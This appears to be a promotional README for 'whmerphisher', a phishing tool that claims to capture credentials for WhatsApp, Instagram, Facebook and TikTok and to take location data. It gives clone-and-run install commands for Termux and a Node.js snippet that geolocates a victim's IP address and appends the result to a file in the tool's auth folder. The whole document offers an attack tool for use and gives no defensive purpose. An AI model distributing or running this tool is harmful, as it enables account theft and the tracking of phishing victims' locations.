Hello! ( whmerphisher ) A phisher program created by the Whmer && sasame society, this program has some features. Phisher from [WhatsApp, Instagram, Facebook, Tik Tok, Location]
F-Droid (Download Termux Clicke Me)
git clone https://github.com/whmer/wphisher.git
cd wphisher
chmod +x install.sh
bash install.sh
const http = require('http');
const fs = require('fs');
const readline = require('readline');
const rl = readline.createInterface({
input: process.stdin,
output: process.stdout
});
rl.question('\n[-] IP : ', (ip) => {
http.get(`http://ipinfo.io/${ip}/geo`, (resp) => {
let data = '';
resp.on('data', (chunk) => {
data += chunk;
});
resp.on('end', () => {
const parsedData = JSON.parse(data);
const formattedData = JSON.stringify(parsedData, null, 2);
console.log(formattedData);
fs.writeFile('./auth/sam_info_ip.dat', formattedData, { flag: 'a'}, (err) => {
if (err) throw err;
});
});
}).on("error", (err) => {
console.log("\nErro: " + err.message);
});
rl.close();
});
© 2024 whmer, version [0.2.3]